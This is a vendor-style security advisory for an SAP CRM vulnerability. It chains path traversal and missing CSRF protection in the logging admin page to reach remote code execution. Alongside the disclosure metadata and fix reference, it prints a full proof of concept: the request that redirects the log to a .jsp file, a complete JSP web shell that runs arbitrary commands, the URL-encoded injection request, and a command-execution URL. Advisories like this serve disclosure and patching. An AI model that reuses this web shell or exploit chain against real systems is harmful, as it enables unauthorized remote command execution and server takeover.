[ERPSCAN-18-004] RCE via path Traversal using CSRF in SAP CRM
Application: SAP NetWeaver
Versions Affected: SAP CRM 13676083
Vendor URL: SAP
Bugs: CSRF, Path Traversal
Reported: 05.10.2017
Vendor response: 06.10.2017
Date of Public Advisory: 13.02.2018
Reference: SAP Security Note 2547431
Author: Vahagn Vardanyan (ERPScan), Vladimir Egorov (ERPScan)
VULNERABILITY INFORMATION
Class: Directory Traversal
Risk: Medium
Impact: Attacker could read content of arbitrary files on the remote server and expose sensitive data confidentiality
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVSS Information
CVSS v3 Base Score: 6.6 / 10
CVSS Base v3 Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | High (H) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed (C) |
C: Impact to Confidentiality | Low (L) |
I: Impact to Integrity | Low (L) |
A: Impact to Availability | Low (L) |
DESCRIPTION
An attacker can change the path and extension of the log file in SAP CRM using path Traversal and CSRF vulnerability, write the special Java code in this log file, and execute any command via HTTP request.
BUSINESS RISK
An attacker can use a Cross-Site Request Forgery vulnerability for exploiting an authenticated user’s session by making a request containing a certain URL and specific parameters. A function will be executed with an authenticated user’s rights. An attacker may use a Cross-Site Scripting vulnerability to achieve this or can present a specially crafted link to an attacked user.
VULNERABLE PACKAGES
CRM JAVA APPLICATIONS 7.01 SP009
CRM JAVA APPLICATIONS 7.02 SP004
CRM JAVA APPLICATIONS 7.30 SP012
CRM JAVA APPLICATIONS 7.31 SP009
CRM JAVA APPLICATIONS 7.32 SP004
CRM JAVA APPLICATIONS 7.33 SP000
CRM JAVA APPLICATIONS 7.54 SP001
CRM JAVA COMPONENTS 7.01 SP009
CRM JAVA COMPONENTS 7.02 SP004
CRM JAVA COMPONENTS 7.30 SP012
CRM JAVA COMPONENTS 7.31 SP009
CRM JAVA COMPONENTS 7.32 SP004
CRM JAVA COMPONENTS 7.33 SP000
CRM JAVA COMPONENTS 7.54 SP001
CRM JAVA WEB COMPONENTS 7.01 SP009
CRM JAVA WEB COMPONENTS 7.02 SP004
CRM JAVA WEB COMPONENTS 7.30 SP012
CRM JAVA WEB COMPONENTS 7.31 SP009
CRM JAVA WEB COMPONENTS 7.32 SP004
CRM JAVA WEB COMPONENTS 7.33 SP000
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2547431
TECHNICAL DESCRIPTION
Proof of Concept
Path Traversal
Using this path traversal an attacker can change CRM log path.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
POST /b2b/admin/logging.jsp HTTP/1.1 Host: 172.16.10.65:50001 Connection: close Content-Length: 302 Cache-Control: max-age=0 Origin: https://172.16.10.65:50001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.71 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: https://172.16.10.65:50001/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1 Accept-Encoding: gzip, deflate, br Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: xsrfid=1&selConfigName=com.sap.isa&selSeverity=0&selDest=C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp&selLimit=10485760&selCount=20&selFormatterType=ListFormat&selPattern=none&mode=save&selLocationIdx=1 |
There is an authorization mechanism here, but there is no CSRF token (in configuration panel we enabled CSRF protection).

Uploading RCE
After creating an evil log file, an attacker can send this request with jsp shell to server, and server writes C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp
file this jsp code
1 |
<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("cmd") != null){Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); out.println("<PRE>"); while ( disr != null ) {out.println(disr);disr =dis.readLine();}out.println("</PRE>");} %> |

1 |
https://172.16.10.65:50001/b2b/init.do?"]%3c%25%40+page+import%3d"java.util.*,java.io.*"%25>%3c%25+if+(request.getParameter("cmd")+!%3d+null){Process+p+%3d+Runtime.getRuntime().exec(request.getParameter("cmd"))%3bOutputStream+os+%3d+p.getOutputStream()%3b+InputStream+in+%3d+p.getInputStream()%3b+DataInputStream+dis+%3d+new+DataInputStream(in)%3b+String+disr+%3d+dis.readLine()%3b+out.println("<PRE>")%3b+while+(+disr+!%3d+null+)+{out.println(disr)%3bdisr+%3ddis.readLine()%3b}out.println("</PRE>")%3b}+%25>["# |
Executing RCE
1 |
https://172.16.10.65:50001/shell.0.jsp?cmd=ipconfig |
